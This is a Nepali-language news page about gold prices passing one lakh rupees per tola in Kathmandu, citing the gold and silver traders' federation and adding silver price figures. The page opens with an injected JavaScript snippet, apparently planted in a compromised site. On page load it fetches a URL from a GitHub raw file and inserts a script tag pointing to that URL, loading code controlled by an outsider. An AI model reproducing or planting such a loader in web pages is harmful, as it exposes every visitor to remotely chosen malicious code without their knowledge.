;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सुनको भाउ तोलाकाे एक लाख रुपैयाँ नाघ्यो – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सुनको भाउ तोलाकाे एक लाख रुपैयाँ नाघ्यो
अर्थ/वाणिज्य

सुनको भाउ तोलाकाे एक लाख रुपैयाँ नाघ्यो

सुनको भनाउ आकाशिएको

साउन २१,
काठमाण्डाै । सुनको भाउ तोलाको एक लाख रुपैयाँ नाघेको छ । आज एकैदिन तोलामा १६ सय रुपैयाँ बढेर सुनको भाउ तोलाको एक लाख एक हजार ४ सय रुपैयाँ निर्धारण गरिएको नेपाल सुनचाँदी व्यवसायी महासंघले जनाएको छ ।

महासंघ अन्तर्गतको भाउ निर्धारण समितिका संयोजक तेजरत्न शाक्यका अनुसार अन्तर्राष्ट्रिय बजारमा आज सुनको भाउ प्रति औंस ४० डलरले बढेको छ । अन्तर्राष्ट्रिय बजारमा सुनमा लगानीकर्ता बढेका, सुनको उत्पादनमा कमी आएको, ठूला देशबीच द्वन्द्व बढेको तथा कोरोना सङ्क्रमणका कारण अस्थिरता बढेकाले सुनको भाउ निरन्तर बढिरहेको उनले बताए ।

यस्तै अन्तर्राष्ट्रिय भाउमा नै भर पर्नुपर्दा नेपालमा सुनको भाउ महंगो भएको हो । यस्तै हिजो र अस्ति स्थिर रहेको चाँदीको भाउ आज तोलामा ६५ रुपैयाँ बढेको छ ।

चाँदी आज तोलाको १२ सय ९५ रुपैयाँ निर्धारण गरिएको महासंघले जनाएको छ ।file Photo

फेसबुक प्रतिक्रियाहरु